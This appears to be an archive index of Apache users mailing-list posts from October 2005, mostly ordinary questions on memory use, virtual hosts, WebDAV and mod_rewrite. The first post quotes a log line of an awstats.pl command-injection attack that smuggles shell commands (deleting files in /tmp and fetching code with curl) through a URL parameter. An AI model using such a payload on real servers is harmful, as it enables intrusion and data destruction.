[EMAIL PROTECTED] GET //awstats.pl? in apache logs

2005-10-21 Thread Konstantine
My apache logs show rows after rows of following, all from various IP addresses. This started a couple of days ago. I don't have awstats. Could somebody tell me what is that? Is there anything I should be doing? thanks.K. GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http:

[EMAIL PROTECTED] ServerRoot/manual/

2005-10-21 Thread Oil Pine
Hello, I've just installed Fedora Core 3 and begun to configure Apache2. I am reading the config file that was installed by FC3. I have difficulty understanding the following instruction. I understand I can simply comment this out, but I want to know what it means before I dismiss it. The manual

Re: [EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread Marc Perkel
David Tonhofer, m-plify S.A. wrote: --On Friday, October 21, 2005 11:16 AM -0700 Marc Perkel <[EMAIL PROTECTED]> wrote: David Tonhofer, m-plify S.A. wrote: I really don't know what the problem could be but let's start a discussion: 1) How many children are there? 2) What is the sum

RE: [EMAIL PROTECTED] Virtual hosts not working

2005-10-21 Thread Bill Measday
It turns out that since I'm sitting behind a router that does NAT, that I need to explicitly list the interface IP address(es) Once this was done, all works perfectly -Original Message- From: Bill Measday [mailto:[EMAIL PROTECTED] Sent: Thursday, 20 October 2005 11:03 AM To: users@http

Re: [EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread David Tonhofer, m-plify S.A.
--On Friday, October 21, 2005 11:16 AM -0700 Marc Perkel <[EMAIL PROTECTED]> wrote: David Tonhofer, m-plify S.A. wrote: I really don't know what the problem could be but let's start a discussion: 1) How many children are there? 2) What is the sum of the processes RSS size? 3) What is the

Re: [EMAIL PROTECTED] web_dav with Apache 2-0-55 on Solaris returning HTTP 301 315 error codes

2005-10-21 Thread Joshua Slive
On 10/21/05, Annie Hamel <[EMAIL PROTECTED]> wrote: > THANKS > > It did work. In addition to your suggested changes, I also had to add > the lock file name at the end of the path for DAVLockDB to make it work. > I had to do this with Apache 1.3.33 too. > > I had a followup question on DAV. Af

Re: [EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread Sean Conner
It was thus said that the Great Marc Perkel once stated: > > I've asked about this before and never got an answer. I used to run my > server on a dual xeon computer and it was very memory efficient. I moved > to the 64 bit version of of Fedora Core 4 and now it's filling up memory > really fast

RE: [EMAIL PROTECTED] web_dav with Apache 2-0-55 on Solaris returning HTTP 301 315 error codes

2005-10-21 Thread Annie Hamel
THANKS It did work. In addition to your suggested changes, I also had to add the lock file name at the end of the path for DAVLockDB to make it work. I had to do this with Apache 1.3.33 too. I had a followup question on DAV. After we connect and create the document directory on the Apache

Re: [EMAIL PROTECTED] Should be easy RewriteRule issue: mod_rewrite.

2005-10-21 Thread Joshua Slive
On 10/21/05, Andoni <[EMAIL PROTECTED]> wrote: > Can you please help me with this RewriteRule. I am trying to all users of my > website to type in: > > www.mysite.com/area1 > > and have it re-written to: > > www.mysite.com/servMainSite?inner=area1 > > The slight complication is that /img, /css and

Re: [EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread Marc Perkel
David Tonhofer, m-plify S.A. wrote: I really don't know what the problem could be but let's start a discussion: 1) How many children are there? 2) What is the sum of the processes RSS size? 3) What is the sum of the processes VSIZE size? Thanks for your perl script. Here's the results: 102

[EMAIL PROTECTED] Should be easy RewriteRule issue: mod_rewrite.

2005-10-21 Thread Andoni
 Hi,   Can you please help me with this RewriteRule. I am trying to all users of my website to type in:   www.mysite.com/area1   and have it re-written to:   www.mysite.com/servMainSite?inner=area1   The slight complication is that /img, /css and /menu have to work as of course does /servMai

Re: [EMAIL PROTECTED] web_dav with Apache 2-0-55 on Solaris returning HTTP 301 315 error codes

2005-10-21 Thread Joshua Slive
On 10/21/05, Annie Hamel <[EMAIL PROTECTED]> wrote: > > I have installed Apache 2_0_55 on a Solaris machine and included > mod_dav/mod_dav_fs in the modules. After I configured Apache and started > it, I tried to use the methods in some of our own application Java code. > The code is trying to cre

Re: [EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread David Tonhofer, m-plify S.A.
I really don't know what the problem could be but let's start a discussion: 1) How many children are there? 2) What is the sum of the processes RSS size? 3) What is the sum of the processes VSIZE size? In other words, run this: #!/usr/bin/perl -w

[EMAIL PROTECTED] Serious Memory Leak Problem

2005-10-21 Thread Marc Perkel
I've asked about this before and never got an answer. I used to run my server on a dual xeon computer and it was very memory efficient. I moved to the 64 bit version of of Fedora Core 4 and now it's filling up memory really fast. Both servers had 4 gigs of ram. And basically the same configura

[EMAIL PROTECTED] web_dav with Apache 2-0-55 on Solaris returning HTTP 301 315 error codes

2005-10-21 Thread Annie Hamel
Hi,   I have installed Apache 2_0_55 on a Solaris machine and included mod_dav/mod_dav_fs in the modules.  After I configured Apache and started it, I tried to use the methods in some of our own application Java code.  The code is trying to create a new instance of WebDavResource object u

Re: [EMAIL PROTECTED] make URL's case insensitive

2005-10-21 Thread Nick Kew
On Friday 21 October 2005 15:11, Bill Parker wrote: > Well, the goal is to simply make everything in the URL which is received by > APACHE lower case, as case sensitivity is a(n) issue on unix/linux/etc. In > windows it doesn't matter, since filenames are case insensitive (hope that > clears up th

Re: [EMAIL PROTECTED] make URL's case insensitive

2005-10-21 Thread Joshua Slive
On 10/21/05, Bill Parker <[EMAIL PROTECTED]> wrote: > Well, the goal is to simply make everything in the URL which is received by > APACHE lower case, as case sensitivity is a(n) issue on unix/linux/etc. In > windows it doesn't matter, since filenames are case insensitive (hope that > clears up th

Re: [EMAIL PROTECTED] make URL's case insensitive

2005-10-21 Thread Bill Parker
Well, the goal is to simply make everything in the URL which is received by APACHE lower case, as case sensitivity is a(n) issue on unix/linux/etc. In windows it doesn't matter, since filenames are case insensitive (hope that clears up the confusion)... - Original Message - From: "Joshua

Re: [EMAIL PROTECTED] mod_rewrite, .htaccess problem

2005-10-21 Thread Joshua Slive
On 10/20/05, Marc Collin <[EMAIL PROTECTED]> wrote: > in httpd.conf > > > Options None > AllowOverride All > Order deny,allow > Deny from all > > > # use .htaccess files for overriding, Why? Why aren't you just putting the directives directly in httpd.conf (perhaps in an appropriate s

[EMAIL PROTECTED] Apache 1.3.26 hangs up after a few days

2005-10-21 Thread Peter Staab
Hello! I am using Apache 1.3.26 on a Debian Woody system. After a certain time (usually 1-2 days) webpages are not accessible any more (the webbrowser shows "waiting for site answer"). when I restart the system (restarting apache does not help) everything works fine for 1-2 days again. here are t

[EMAIL PROTECTED] Apache module loading problem

2005-10-21 Thread Fehmi Noyan ISI
hi I have just installed PHP 5.0.5 from the source. I also installed PostgreSQL and MySQL. I try to compile PHP with PostgreSQL and MySQL support. There was no error messages during installation. But when i try to start httpd i get the followin error : Syntax error on line 238 of /etc/apac

RE: [EMAIL PROTECTED] Apache 2.0.55/win32 + OpenSSL 0.9.8a & OWA Reverse Proxy Problems

2005-10-21 Thread Manuel Martin
Hello Michele, hello list, > I run exactly in the same problem, but with another architecture: > > Red Hat Enterprise Linux AS release 3+4 > Apache 2.0.55 > OpenSSL 0.9.7a > > I'm using Apache also as a SSL-Proxy for a Zope server and some > operations especially with FORMs doesn't work anymor

Re: [EMAIL PROTECTED] Apache 2.0.55/win32 + OpenSSL 0.9.8a & OWA Reverse Proxy Problems

2005-10-21 Thread Michele Marcionelli
Hello, I run exactly in the same problem, but with another architecture: Red Hat Enterprise Linux AS release 3+4 Apache 2.0.55 OpenSSL 0.9.7a I'm using Apache also as a SSL-Proxy for a Zope server and some operations especially with FORMs doesn't work anymore. Thanks for a feedback, Michele